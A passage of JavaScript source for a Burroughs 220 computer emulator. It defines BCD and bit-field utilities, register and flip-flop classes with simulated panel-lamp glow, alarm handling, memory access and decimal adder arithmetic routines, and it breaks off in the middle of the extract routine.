/*********************************************************************** * Global Constants * ***********************************************************************/ B220Processor.version = "1.02a"; B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) B220Processor.cyclesPerMilli = 1/B220Processor.tick; // clock cycles per millisecond (200 => 200KHz) B220Processor.timeSlice = 13; // maximum processor time slice, ms B220Processor.delayAlpha = 0.000001; // decay factor for exponential weighted average delay B220Processor.delayAlpha1 = 1-B220Processor.delayAlpha; B220Processor.slackAlpha = 0.000001; // decay factor for exponential weighted average slack B220Processor.slackAlpha1 = 1-B220Processor.slackAlpha; B220Processor.neonPersistence = 7; // persistence of neon bulb glow [ms] B220Processor.maxGlowTime = B220Processor.neonPersistence; // panel bulb glow persistence [ms] B220Processor.adderGlowAlpha = B220Processor.neonPersistence/12; // adder and carry toggle glow decay factor, // based on one digit (1/12 word) time [ms] B220Processor.pow2 = [ // powers of 2 from 0 to 52 0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x100000000, 0x200000000, 0x400000000, 0x800000000, 0x1000000000, 0x2000000000, 0x4000000000, 0x8000000000, 0x10000000000, 0x20000000000, 0x40000000000, 0x80000000000, 0x100000000000, 0x200000000000, 0x400000000000, 0x800000000000, 0x1000000000000, 0x2000000000000, 0x4000000000000, 0x8000000000000, 0x10000000000000]; B220Processor.mask2 = [ // (2**n)-1 for n from 0 to 52 0x0, 0x1, 0x3, 0x7, 0x0F, 0x1F, 0x3F, 0x7F, 0x0FF, 0x1FF, 0x3FF, 0x7FF, 0x0FFF, 0x1FFF, 0x3FFF, 0x7FFF, 0x0FFFF, 0x1FFFF, 0x3FFFF, 0x7FFFF, 0x0FFFFF, 0x1FFFFF, 0x3FFFFF, 0x7FFFFF, 0x0FFFFFF, 0x1FFFFFF, 0x3FFFFFF, 0x7FFFFFF, 0x0FFFFFFF, 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0x0FFFFFFFF, 0x1FFFFFFFF, 0x3FFFFFFFF, 0x7FFFFFFFF, 0x0FFFFFFFFF, 0x1FFFFFFFFF, 0x3FFFFFFFFF, 0x7FFFFFFFFF, 0x0FFFFFFFFFF, 0x1FFFFFFFFFF, 0x3FFFFFFFFFF, 0x7FFFFFFFFFF, 0x0FFFFFFFFFFF, 0x1FFFFFFFFFFF, 0x3FFFFFFFFFFF , 0x7FFFFFFFFFFF, 0x0FFFFFFFFFFFF, 0x1FFFFFFFFFFFF, 0x3FFFFFFFFFFFF, 0x7FFFFFFFFFFFF, 0x0FFFFFFFFFFFFF] ; B220Processor.multiplyDigitCounts = [1, 14, 27, 40, 53, 66, 65, 52, 39, 26]; /*********************************************************************** * Utility Functions * ***********************************************************************/ /**************************************/ B220Processor.emptyFunction = function emptyFunction() { /* A function that does nothing, used for overriding object methods */ return; }; /**************************************/ B220Processor.bcdBinary = function bcdBinary(v) { /* Converts the BCD value "v" to a binary number and returns it. 
If a BCD digit is not decimal, coerces it to an 8 or 9 instead */ var d; var power = 1; var result = 0; while(v) { d = v % 0x10; v = (v-d)/0x10; if (d > 9) { d &= 0x09; // turn off the middle 2 bits } result += d*power; power *= 10; } return result; }; /**************************************/ B220Processor.binaryBCD = function binaryBCD(v) { /* Converts the binary value "v" to a BCD number and returns it */ var d; var power = 1; var result = 0; while(v) { d = v % 10; result += d*power; power *= 0x10; v = (v-d)/10; } return result; }; /**************************************/ B220Processor.padLeft = function padLeft(v, digits, pad) { /* Converts "v" to a string if necessary and formats to a total length of "digits," padding with the "pad" character on the left. Used only for debug */ var padChar = (pad || "0").toString(); var s = v.toString(); var len = s.length; if (len > digits) { s = s.substring(len-digits); } else { while (len < digits) { s = padChar + s; ++len; } } return s; }; /**************************************/ B220Processor.formatWord = function formatWord(w) { /* Formats the BCD value of 220 word "w" as the customary "9 9999 99 9999" */ var s = B220Processor.padLeft(w.toString(16), 11); return s.substring(0, 1) + " " + s.substring(1, 5) + " " + s.substring(5, 7) + " " + s.substring(7); }; /*********************************************************************** * Bit and Field Manipulation Functions * ***********************************************************************/ /**************************************/ B220Processor.bitTest = function bitTest(word, bit) { /* Extracts and returns the specified bit from the word */ var p; // bottom portion of word power of 2 if (bit > 0) { return ((word - word % (p = B220Processor.pow2[bit]))/p) % 2; } else { return word % 2; } }; /**************************************/ B220Processor.bitSet = function bitSet(word, bit) { /* Sets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return bpower + top + bottom; }; /**************************************/ B220Processor.bitReset = function bitReset(word, bit) { /* Resets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % B220Processor.pow2[bit])); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return top + bottom; }; /**************************************/ B220Processor.bitFlip = function bitFlip(word, bit) { /* Complements the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 
0 : (word % bpower)); var middle = // bottom portion of word starting with affected bit word % B220Processor.pow2[ue]; var top = word - middle; // unaffected top portion of word if (middle >= bpower) { // if the affected bit is a one return top + bottom; // return the result with it set to zero } else { // otherwise return bpower + top + bottom; // return the result with it set to one } }; /**************************************/ B220Processor.fieldIsolate = function fieldIsolate(word, start, width) { /* Extracts a bit field [start:width] from word and returns the field */ var le = start-width+1; // lower power exponent var p; // bottom portion of word power of 2 return (le <= 0 ? word : (word - word % (p = B220Processor.pow2[le]))/p ) % B220Processor.pow2[width]; }; /**************************************/ B220Processor.fieldInsert = function fieldInsert(word, start, width, value) { /* Inserts a bit field from the low-order bits of value ([48-width:width]) into word.[start:width] and returns the updated word */ var ue = start+1; // word upper power exponent var le = ue-width; // word lower power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return (value % B220Processor.pow2[width])*bpower + top + bottom; }; /**************************************/ B220Processor.fieldTransfer = function fieldTransfer(word, wstart, width, value, vstart) { /* Inserts a bit field from value.[vstart:width] into word.[wstart:width] and returns the updated word */ var ue = wstart+1; // word upper power exponent var le = ue-width; // word lower power exponent var ve = vstart-width+1; // value lower power exponent var vpower; // bottom port of value power of 2 var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return ((ve <= 0 ? 
value : (value - value % (vpower = B220Processor.pow2[ve]))/vpower ) % B220Processor.pow2[width] )*bpower + top + bottom; }; /*********************************************************************** * System Clear & Lamp Glow Management * ***********************************************************************/ /**************************************/ B220Processor.prototype.clear = function clear() { /* Initializes (and if necessary, creates) the processor state */ // Primary Registers this.A.set(0); this.B.set(0); this.C.set(0); this.D.set(0); this.E.set(0); this.P.set(0); this.R.set(0); this.S.set(0); this.IB.set(0); // Control Console Lamps this.digitCheckAlarm.set(0); this.systemNotReady.set(0); this.computerNotReady.set(0); this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI.set(0); this.DC.set(0); this.SC.set(0); this.SI.set(0); this.X.set(0); this.Y.set(0); this.Z.set(0); this.C10.set(0); this.DST.set(0); this.LT1.set(0); this.LT2.set(0); this.LT3.set(0); this.SCI.set(0); this.SGT.set(0); this.SUT.set(0); this.TBT.set(0); this.TCT.set(0); this.TPT.set(0); this.TWT.set(0); // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX.set(0); this.BI.set(0); this.DX.set(0); this.PA.set(0); this.ALT.set(0); this.AST.set(0); this.CCT.set(0); this.CRT.set(0); this.DPT.set(0); this.EWT.set(0); this.EXT.set(this.FETCHEXECUTELOCKSW == 2 ? 1 : 0); this.HAT.set(0); this.HCT.set(0); this.HIT.set(0); this.MAT.set(0); this.MET.set(0); this.MNT.set(0); this.OFT.set(0); this.PAT.set(0); this.PRT.set(0); this.PZT.set(0); this.RPT.set(0); this.RUT.set(0); this.SST.set(0); this.TAT.set(0); this.UET.set(0); this.CCONTROL = 0; // copy of C register control digits (4 digits) this.COP = 0; // copy of C register op code (2 digits) this.CADDR = 0; // copy of C register operand address (4 digits) // I/O globals this.rDigit = 0; // variant/format digit from control part of instruction this.vDigit = 0; // variant digit from control part of instruction this.selectedUnit = 0; // currently-selected unit number // Kill any pending action that may be in process if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } this.updateLampGlow(1); // initialize the lamp states }; /**************************************/ B220Processor.prototype.validateDigitCheck = function validateDigitCheck() { /* Steps through all of the properties of the Processor object, isolating the Register() objects and determining if any of them have a Forbidden Combination condition. If not, turns off the Digit Check alarm */ var alarm = false; // true if any register has FC var name = ""; // current property name var reg = null; // current Register object for (name in this) { reg = this[name]; if (reg instanceof B220Processor.Register) { if (reg.hasFC) { alarm = true; break; // out of for loop } } } // for name if (!alarm) { this.digitCheckAlarm.set(0); } }; /**************************************/ B220Processor.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow for all registers and flip-flops in the system. Beta is a bias in the range (0,1). For normal update use 0; to freeze the current state in the lamps use 1 */ var gamma = (this.RUT.value ? beta || 0 : 1); // First, check whether a Digit Check alarm exists and if the condition has resolved. 
if (this.digitCheckAlarm.value) { this.validateDigitCheck(); } // Primary Registers this.A.updateLampGlow(gamma); this.B.updateLampGlow(gamma); this.C.updateLampGlow(gamma); this.D.updateLampGlow(gamma); this.E.updateLampGlow(gamma); this.P.updateLampGlow(gamma); this.R.updateLampGlow(gamma); this.S.updateLampGlow(gamma); this.IB.updateLampGlow(gamma); // Control Console Lamps this.digitCheckAlarm.updateLampGlow(gamma); this.systemNotReady.updateLampGlow(gamma); this.computerNotReady.updateLampGlow(gamma); this.compareLowLamp.updateLampGlow(gamma); this.compareEqualLamp.updateLampGlow(gamma); this.compareHighLamp.updateLampGlow(gamma); // Left-Hand Maintenance Panel Registers & Flip-Flops if (this.leftPanelOpen) { this.CI.updateLampGlow(gamma); this.DC.updateLampGlow(gamma); this.SC.updateLampGlow(gamma); this.SI.updateLampGlow(gamma); this.X.updateLampGlow(gamma); this.Y.updateLampGlow(gamma); this.Z.updateLampGlow(gamma); this.C10.updateLampGlow(gamma); this.DST.updateLampGlow(gamma); this.LT1.updateLampGlow(gamma); this.LT2.updateLampGlow(gamma); this.LT3.updateLampGlow(gamma); this.SCI.updateLampGlow(gamma); this.SGT.updateLampGlow(gamma); this.SUT.updateLampGlow(gamma); this.TBT.updateLampGlow(gamma); this.TCT.updateLampGlow(gamma); this.TPT.updateLampGlow(gamma); this.TWT.updateLampGlow(gamma); } // Right-Hand Maintenance Panel Registers & Flip-Flops this.ALT.updateLampGlow(gamma); this.MET.updateLampGlow(gamma); this.TAT.updateLampGlow(gamma); this.PAT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.HAT.updateLampGlow(gamma); this.EXT.updateLampGlow(gamma); this.OFT.updateLampGlow(gamma); this.RPT.updateLampGlow(gamma); this.RUT.updateLampGlow(gamma); if (this.rightPanelOpen) { this.AX.updateLampGlow(gamma); this.BI.updateLampGlow(gamma); this.DX.updateLampGlow(gamma); this.PA.updateLampGlow(gamma); this.AST.updateLampGlow(gamma); this.CCT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.DPT.updateLampGlow(gamma); this.EWT.updateLampGlow(gamma); this.HCT.updateLampGlow(gamma); this.HIT.updateLampGlow(gamma); this.MAT.updateLampGlow(gamma); this.MNT.updateLampGlow(gamma); this.PRT.updateLampGlow(gamma); this.PZT.updateLampGlow(gamma); this.SST.updateLampGlow(gamma); this.UET.updateLampGlow(gamma); } }; /**************************************/ B220Processor.prototype.asyncOff = function asyncOff() { /* Updates the emulated processor clock while operating asynchronously during I/O so that glow averages can be updated based on elapsed time. 
Also used at the end of and I/O to synchronize the emulated clock with real time */ if (this.asyncTime < 0) { this.asyncTime += performance.now(); this.execClock += this.asyncTime; this.procSlack += this.asyncTime; // consider I/O time to be processor slack } }; /**************************************/ B220Processor.prototype.asyncOn = function asyncOn() { /* Sets this.asyncTime to start asynchronous timing for the processor during I/O */ if (this.asyncTime >= 0) { this.asyncTime = -performance.now(); } }; /**************************************/ B220Processor.prototype.procOff = function procOff() { /* Stops emulated internal run timing for the processor */ while (this.procTime < 0) { this.procTime += this.execClock; } }; /**************************************/ B220Processor.prototype.procOn = function procOn() { /* Starts emulated internal run timing for the processor */ while (this.procTime >= 0) { this.procTime -= this.execClock; } }; /*********************************************************************** * Generic Register Class * ***********************************************************************/ B220Processor.Register = function Register(bits, p, invisible) { /* Constructor for the generic Register class. Defines a binary register of "bits" bits. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the register does not have a visible presence in the UI -- this will inhibit computing average lamp glow values for the register. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.bits = bits; // number of bits in register this.visible = (invisible ? false : true); this.hasFC = false; // true if Forbidden Combination (A-F digit) detected this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = new Float64Array(bits); // average lamp glow values }; /**************************************/ B220Processor.Register.prototype.checkFC = function checkFC() { /* Checks the register for a Forbidden Combination (hex A-F) digit. If at least one exists, sets the Digit Check alarm and returns true. The bit mask operations are done 28 bits at a time to avoid problems with the 32-bit 2s-complement arithmetic used by Javascript for bit operations */ var hasFC = false; // true if register has Forbidden Combination var v1 = this.value; // high-order digits (eventually) var v2 = v1%0x10000000; // low-order 7 digits v1 = (v1-v2)/0x10000000; if (((v2 & 0x8888888) >>> 3) & (((v2 & 0x4444444) >>> 2) | ((v2 & 0x2222222) >>> 1))) { hasFC = true; } else if (v1 > 9) { if (((v1 & 0x8888888) >>> 3) & (((v1 & 0x4444444) >>> 2) | ((v1 & 0x2222222) >>> 1))) { hasFC = true; } } this.hasFC = hasFC; if (!hasFC) { return 0; } else { this.p.setDigitCheck(1); return 1; } }; /**************************************/ B220Processor.Register.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow averages based on this.p.execClock. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). 
For normal update, use 0; to freeze the current state, use 1 */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); var alpha1 = 1.0-alpha; var b = 0; var bit; var v = this.value; if (this.visible) { while (v) { bit = v % 2; v = (v-bit)/2; this.glow[b] = this.glow[b]*alpha1 + bit*alpha; ++b; } while (b < this.bits) { this.glow[b] *= alpha1; ++b; } } this.lastExecClock = this.p.execClock; }; /**************************************/ B220Processor.Register.prototype.set = function set(value) { /* Set a binary value into the register. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = value; if (this.visible) { this.updateLampGlow(0); } if (value > 9) { this.checkFC(); } else { this.hasFC = false; } return value; }; /**************************************/ B220Processor.Register.prototype.getDigit = function getDigit(digitNr) { /* Returns the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return B220Processor.fieldIsolate(this.value, digitNr*4+3, 4); }; /**************************************/ B220Processor.Register.prototype.setDigit = function setDigit(digitNr, value) { /* Sets the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return this.set(B220Processor.fieldInsert(this.value, digitNr*4+3, 4, value)); }; /**************************************/ B220Processor.Register.prototype.getBit = function getBit(bitNr) { /* Returns the value of a bit in the register */ return (bitNr < this.bits ? B220Processor.bitTest(this.value, bitNr) : 0); }; /**************************************/ B220Processor.Register.prototype.setBit = function setBit(bitNr, value) { /* Set a bit on or off in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit = (value ? 1 : 0); if (bitNr < this.bits) { // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = (bit ? B220Processor.bitSet(this.value, bitNr) : B220Processor.bitReset(this.value, bitNr)); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.flipBit = function flipBit(bitNr) { /* Complements a bit in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit; if (bitNr < this.bits) { bit = 1 - B220Processor.bitTest(this.value, bitNr); // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = B220Processor.bitFlip(this.value, bitNr); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.add = function add(addend) { /* Adds "addend" to the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. 
Also note that this uses the 220 adder, so generally do not use this
    for simple increment of address and counter registers -- use .inc() instead */
    var digits = (this.bits+3) >> 2;

    return this.set(this.p.bcdAdd(this.value, addend, digits) % B220Processor.pow2[this.bits]);
};

/**************************************/
B220Processor.Register.prototype.sub = function sub(subtrahend) {
    /* Subtracts "subtrahend" from the current register value without regard to
    sign, discarding any overflow beyond the number of bits defined for the
    register. Returns the new register value. NOTE THAT THE SUBTRAHEND IS IN BCD,
    NOT BINARY. Also note that this uses the 220 adder, so generally do not use
    this for simple decrement of address and counter registers -- use .dec() instead */
    var digits = (this.bits+3) >> 2;

    return this.set(this.p.bcdAdd(subtrahend, this.value, digits, 1, 1) % B220Processor.pow2[this.bits]);
};

/**************************************/
B220Processor.Register.prototype.inc = function inc() {
    /* Increments the register by 1 using BCD arithmetic and returns the new
    register value. This method does not use the 220 adder, so is safe to use
    for incrementing address and counter registers during instructions. Any
    overflow is discarded and the register wraps around to zero */
    var d = this.value%0x10;            // current low-order digit
    var maxPower = B220Processor.pow2[this.bits];
    var power = 1;                      // factor for current digit position
    var w = this.value;                 // working copy of register value

    while (d == 9 && power < maxPower) {// while a carry would be generated
        this.value -= 9*power;          // change this digit to a zero
        power *= 0x10;                  // bump power for next digit
        w = (w-d)/0x10;                 // shift working copy down
        d = w%0x10;                     // isolate the next digit
    }

    if (d < 9) {
        this.value += power;            // increment the first digit that will not generate carry
    }

    return this.set(this.value % B220Processor.pow2[this.bits]);
};

/**************************************/
B220Processor.Register.prototype.dec = function dec() {
    /* Decrements the register by 1 using BCD arithmetic and returns the new
    register value. This method does not use the 220 adder, so is safe to use
    for decrementing address and counter registers during instructions. Any
    underflow is discarded and the register wraps around to all-nines */
    var d = this.value%0x10;            // current low-order digit
    var maxPower = B220Processor.pow2[this.bits];
    var power = 1;                      // factor for current digit position
    var w = this.value;                 // working copy of register value

    while (d == 0 && power < maxPower) {// while a borrow would be generated
        this.value += 9*power;          // change this digit to a 9
        power *= 0x10;                  // bump power for next digit
        w = (w-d)/0x10;                 // shift working copy down
        d = w%0x10;                     // isolate the next digit
    }

    if (d > 0) {
        this.value -= power;            // decrement the first digit that will not generate a borrow
    }

    return this.set(this.value % maxPower);
};

/***********************************************************************
*   Generic Flip-Flop Class                                            *
***********************************************************************/

B220Processor.FlipFlop = function FlipFlop(p, invisible) {
    /* Constructor for the generic FlipFlop class. "p" is a reference to the
    Processor object, used to access the timing members. "invisible" should be
    true if the FF does not have a visible presence in the UI -- this will
    inhibit computing the average lamp glow value for it.
    Note that it is important to increment this.execClock in the caller AFTER
    setting new values in registers and flip-flops.
This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.visible = (invisible ? false : true); this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = 0; // average lamp glow value }; /**************************************/ B220Processor.FlipFlop.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the average glow for the flip flop. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1. Returns the new average */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); if (this.visible) { this.glow = this.glow*(1.0-alpha) + this.value*alpha; } this.lastExecClock = this.p.execClock; return this.glow; }; /**************************************/ B220Processor.FlipFlop.prototype.set = function set(value) { /* Set the value of the FF. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = (value ? 1 : 0); if (this.visible) { this.updateLampGlow(0); } return value; }; /**************************************/ B220Processor.FlipFlop.prototype.flip = function flip() { /* Complement the value of the FF. Returns the new value */ return this.set(1-this.value); }; /*********************************************************************** * System Alarms * ***********************************************************************/ /**************************************/ B220Processor.prototype.setDigitCheck = function setDigitCheck(value) { /* Sets the Digit Check alarm */ if (!this.ALARMSW && !this.DIGITCHECKSW) { this.digitCheckAlarm.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setProgramCheck = function setProgramCheck(value) { /* Sets the Program Check alarm */ if (!this.ALARMSW) { this.ALT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setStorageCheck = function setStorageCheck(value) { /* Sets the Storage Check alarm */ if (!this.ALARMSW) { this.MET.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setMagneticTapeCheck = function setMagneticTapeCheck(value) { /* Sets the Magnetic Tape Check alarm */ if (!this.ALARMSW) { this.TAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setCardatronCheck = function setCardatronCheck(value) { /* Sets the Cardatron Check alarm */ if (!this.ALARMSW) { this.CRT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setPaperTapeCheck = function setPaperTapeCheck(value) { /* Sets the Paper Tape Check alarm */ if (!this.ALARMSW) { this.PAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setHighSpeedPrinterCheck = function setHighSpeedPrinterCheck(value) { /* Sets the High Speed Printer Check alarm */ if (!this.ALARMSW) { this.HAT.set(value); if (value) { this.setStop(); } } }; /*********************************************************************** * Memory 
Access * ***********************************************************************/ /**************************************/ B220Processor.prototype.readMemory = function readMemory() { /* Reads the contents of one word of memory into the IB register from the address in the E register. Sets the Storage Check alarm if the address is not valid. Returns the word fetched, or the current value of IB if invalid address */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); return this.IB.value; } else if (addr >= this.memorySize) { this.setStorageCheck(1); return this.IB.value; } else if (this.MEMORYLOCKOUTSW) { return this.IB.set(this.D.value); } else { return this.IB.set(this.MM[addr]); } }; /**************************************/ B220Processor.prototype.writeMemory = function writeMemory() { /* Stores one word of memory from the IB register to the address in the E register. Sets the Storage Check alarm if the address is not valid */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); } else if (addr >= this.memorySize) { this.setStorageCheck(1); } else if (this.MEMORYLOCKOUTSW) { this.D.set(this.IB.value); } else { this.MM[addr] = this.IB.value; } }; /*********************************************************************** * The 220 Adder and Arithmetic Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.bcdAdd = function bcdAdd(a, d, digits, complement, initialCarry) { /* Returns an unsigned, BCD addition of "a" and "d", producing "digits" of BCD result. Any higher-order digits and any overflow are discarded. Maximum capacity in Javascript (using IEEE 64-bit floating point) is 14 digits. On input, "complement" indicates whether 9s-complement addition should be performed; "initialCarry" indicates whether an initial carry of 1 should be applied to the adder. On output, this.CI is set from the final carry toggles of the addition and this.C10 will have the carry toggle. Further, this.Z will still have a copy of the sign (high-order) digit. 
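    As an illustrative sketch: bcdAdd(0x0047, 0x0025, 4) returns 0x0072, while
    bcdAdd(0x0025, 0x0047, 4, 1, 1) performs a 10s-complement subtraction of the
    first operand from the second and returns 0x0022.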
Sets the Program Check alarm if non-decimal digits are encountered, but does not set the Overflow toggle */ var ad; // current augend (a) digit; var adder; // local copy of adder digit var am = a % B220Processor.pow2[digits*4]; // augend mantissa var carry = (initialCarry || 0) & 1;// local copy of carry toggle (CI1, CAT) var compl = complement || 0; // local copy of complement toggle var ct = carry; // local copy of carry register (CI1-16) var dd; // current addend (d) digit; var dm = d % B220Processor.pow2[digits*4]; // addend mantissa var shiftPower = B220Processor.pow2[(digits-1)*4]; // to position high-order digit var x; // digit counter // Loop through the digits for (x=0; x<digits; ++x) { // shift low-order augend digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC if (compl) { ad = 9-ad; } // Add the digits plus carry, complementing as necessary dd = dm % 0x10; this.Y.set(dd); // tests for FC adder = ad + dd + carry; // Decimal-correct the adder if (adder < 10) { carry = 0; } else { adder -= 10; carry = 1; } // Compute the carry toggle register (just for display) ct = (((ad & dd) | (ad & ct) | (dd & ct)) << 1) + carry; // Update the visible registers (for display only) this.Z.set(adder); // tests for FC this.C10.set(carry); this.CI.set(ct); this.SI.set(0x0F ^ ct); // just a guess as to the sum inverters // rotate the adder into the high-order digit am += adder*shiftPower; // shift the addend right to the next digit dm = (dm - dd)/0x10; } // for x return am; }; /**************************************/ B220Processor.prototype.clearAdd = function clearAdd(absolute) { /* After accessing memory, algebraically add the addend (IB) to zero. If "absolute" is true, then the sign-bit of the word from memory is forced to the subtract toggle. All values are BCD with the sign in the 11th digit position. Sets the Digit Check alarm as necessary */ var am = 0; // augend mantissa var dm; // addend mantissa var dSign; // addend sign this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000); if (absolute) { // force sign bit to SUT dSign = (dSign & 0x0E) | this.SUT.value; } else if (this.SUT.value) { // complement the sign bit dSign = dSign ^ 0x01; } am = this.bcdAdd(am, dm, 11); // Set toggles for display purposes and return the result this.DST.set(dSign%2); this.SGT.set(dSign%2); this.D.set(dSign*0x10000000000 + dm); this.A.set(dSign*0x10000000000 + am); }; /**************************************/ B220Processor.prototype.integerAdd = function integerAdd(absolute, toD) { /* After accessing memory, algebraically add the addend (IB) to the augend (A). If "absolute" is true, then the sign of the word from memory is forced to zero. If "toD" is false, the result will be left in A, and D will contain a copy of the word from memory with the three high-order bits of its sign set to zero. If "toD" is true, the result will be left in D, and A will not be altered, except than the three high-order bits of its sign digit will be set to zero. Note that if the value of the result is zero, its sign will be the original sign of A. All values are BCD with the sign in the 11th digit position. 
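    (For example, a word of 0x10000000005 represents -5: the low-order bit of the
    11th (sign) digit marks the value as negative.)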
Sets the Overflow and Digit Check alarms as necessary */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm; // addend mantissa var dSign; // addend sign var sign; // local copy of sign toggle var timing = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we have overflow // or need to recomplement the result switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; timing += 0.060; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); if (toD) { this.D.set(am); this.A.set(this.A.value%0x20000000000); } else { this.D.set(dSign*0x10000000000 + dm); this.A.set(am); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.integerExtract = function integerExtract() { /* "Extract" digits from A according to the digit pattern in IB. If a pattern digit is even, then the corresponding digit in the value is set to zero. If the pattern digit is odd, then the corresponding value digit is not changed. Overflow is not possible, but a Digit Check alarm can occur */ var ad; // current value (A) digit; var am = this.A.value; // value mantissa var dd; // current pattern (D) digit; var dm; // pattern mantissa var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } // Loop through the 11 digits including signs dm = this.IB.value; for (x=0; x<11; ++x) { // shift low-order value digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC // shift low-order pattern digit into the adder dd = dm % 0x10; dm = (dm - dd)/0x10; this.Y.set(dd); // tests for FC if (dd%2) { // if extract digit is odd this.Z.set(ad); // keep the value digit } else { // otherwise, if it's even ad = 0; // clear the value digit 